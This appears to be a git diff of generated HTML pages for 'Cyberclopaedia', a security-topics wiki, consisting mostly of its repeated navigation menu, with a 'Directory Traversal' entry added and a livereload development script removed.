    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -189,22 +189,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Reconnaissance/OSINT/Whois Enumeration.html b/docs/Reconnaissance/OSINT/Whois Enumeration.html index d2d91119..d77e4a8e 100644 --- a/docs/Reconnaissance/OSINT/Whois Enumeration.html +++ b/docs/Reconnaissance/OSINT/Whois Enumeration.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -200,22 +200,6 @@

Rev - - diff --git a/docs/Reconnaissance/OSINT/index.html b/docs/Reconnaissance/OSINT/index.html index 3d8523d2..415754b3 100644 --- a/docs/Reconnaissance/OSINT/index.html +++ b/docs/Reconnaissance/OSINT/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
